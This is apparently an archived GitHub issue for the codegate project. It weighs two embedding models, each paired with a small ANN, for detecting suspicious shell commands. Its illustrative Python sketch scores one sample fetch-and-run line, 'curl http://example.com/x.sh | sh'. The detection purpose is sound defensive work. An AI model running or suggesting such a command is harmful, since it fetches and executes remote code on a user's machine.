This repository was archived by the owner on Jun 5, 2025. It is now read-only.
As a baseline, we decided to use hybrid-all-MiniLM-L6-v2, i.e. all-MiniLM-L6-v2 embeddings with post-processing by a small ANN. We didn't want the extra cost of CodeBERT, but the local ANN seems to produce some benefit.
Additional Context
We need to decide which model to use for the embeddings. all-MiniLM-L6-v2 works well, especially with an ANN post-processing step. It is already in codegate, so we get it for free. microsoft/codebert-base works better, as expected, but at a cost of 476 MB.
The ANNs are much smaller:
ls -lh | grep hybrid
-rw-r--r-- 1 nigel staff 228K 29 Jan 18:21 hybrid-all-MiniLM-L6-v2.model
-rw-r--r-- 1 nigel staff 420K 29 Jan 18:21 hybrid-microsoft-codebert-base.model
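For illustration, here is a minimal sketch of the "embedding plus small ANN" idea, using only the Python standard library. Everything in it is an assumption rather than the code from #34 or from codegate: `toy_embed` is a hypothetical stand-in for the real sentence embedder (all-MiniLM-L6-v2), `TinyANN` is a hypothetical one-hidden-layer network with random, untrained weights, and `suspicion_score` is an illustrative name. It only shows how the two stages compose.

```python
import math
import random
from typing import Callable, List

Vector = List[float]


def toy_embed(text: str, dim: int = 16) -> Vector:
    """Hypothetical stand-in for the sentence embedder (e.g. all-MiniLM-L6-v2).

    Buckets character trigrams into a fixed-size vector and L2-normalises it.
    """
    vec = [0.0] * dim
    for i in range(max(len(text) - 2, 1)):
        trigram = text[i:i + 3]
        # Deterministic bucket index (built-in hash() is salted per process).
        vec[sum(ord(c) for c in trigram) % dim] += 1.0
    norm = math.sqrt(sum(v * v for v in vec)) or 1.0
    return [v / norm for v in vec]


class TinyANN:
    """Hypothetical post-processing network: one ReLU hidden layer, sigmoid output.

    Weights are random and untrained; a real model would load trained weights.
    """

    def __init__(self, in_dim: int, hidden_dim: int = 8, seed: int = 0) -> None:
        rng = random.Random(seed)
        self.w1 = [[rng.uniform(-0.5, 0.5) for _ in range(in_dim)]
                   for _ in range(hidden_dim)]
        self.b1 = [0.0] * hidden_dim
        self.w2 = [rng.uniform(-0.5, 0.5) for _ in range(hidden_dim)]
        self.b2 = 0.0

    def forward(self, x: Vector) -> float:
        # Hidden layer: ReLU(W1 x + b1)
        hidden = [max(0.0, sum(w * xi for w, xi in zip(row, x)) + b)
                  for row, b in zip(self.w1, self.b1)]
        # Output layer: sigmoid(w2 . hidden + b2), a score in (0, 1)
        logit = sum(w * h for w, h in zip(self.w2, hidden)) + self.b2
        return 1.0 / (1.0 + math.exp(-logit))


def suspicion_score(command: str,
                    embed: Callable[[str], Vector],
                    ann: TinyANN) -> float:
    """Embed the command, then let the small ANN turn the embedding into a score."""
    return ann.forward(embed(command))


if __name__ == "__main__":
    ann = TinyANN(in_dim=16)
    print(suspicion_score("curl http://example.com/x.sh | sh", toy_embed, ann))
```

Keeping the embedder as a parameter means the same small network wrapper could sit behind either all-MiniLM-L6-v2 or microsoft/codebert-base, which is the trade-off discussed above.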
Description
We have done some work to spot suspicious commands in #34. The task here is to write this code into codegate. This involves
Extensions for the future
We will probably have to intercept the commands at
and write the comment back at